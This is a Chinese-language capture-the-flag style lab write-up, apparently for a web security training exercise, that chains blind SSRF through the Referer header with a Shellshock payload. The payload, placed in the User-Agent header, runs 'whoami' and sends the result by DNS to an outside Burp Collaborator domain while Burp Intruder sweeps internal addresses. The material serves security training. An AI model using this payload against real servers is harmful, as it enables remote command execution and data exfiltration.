第六关 Shellshock 利用的盲 SSRF
这一关就是通过Shellshock 程序漏洞和burp的Collaborator(协作者公共服务器)相结合,然后构造请求,实现ssrf攻击
提示:1、靶场使用分析软件,在加载产品页面时获取 Referer 标题中指定的 URL。
**2、要解决实验室问题,请使用此功能对端口 8080 上 192.168.0.X 范围内的内部服务器执行盲 SSRF 攻击。在盲攻击中,对内部服务器使用 Shellshock 有效负载来窃取作系统用户的名称。
具体操作:
1、在burp运行时,浏览网站,点击产品查看
加载产品时会通过referfer头,还有表明身份信息的User-Agent ,然后把这个请求发往intruder
转到 Collaborator 选项卡并生成一个唯一的 Burp Collaborator 有效负载。将其放入以下 Shellshock 有效负载中
复制burp生成的子域名:gbvx812251582g510sp3v12jua01osch.oastify.com
将 Burp Intruder 请求中的 User-Agent 字符串替换为包含您的协作者域的 Shellshock 有效负载。
1、User-Agent头改成:
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).gbvx81225l582g510sp3vl2jua01osch.oastify.com
**2、将 Referer 标头更改为,给D段添加变量:Referer: http://192.168.0.§1§:8080
选择数字类型,范围是1到255,间隔1,最大整数位3
线程池保持默认,开始攻击
攻击完成后,转到“协作者”选项卡,
然后单击“Poll now”。如果未列出任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。您应该会看到由后端系统发起的 DNS 交互,该系统受到成功的盲 SSRF 攻击。作系统用户的名称应显示在 DNS 子域中。
外带出用户名:peter-6C8qcW
提交外带泄露的用户名,靶场过关
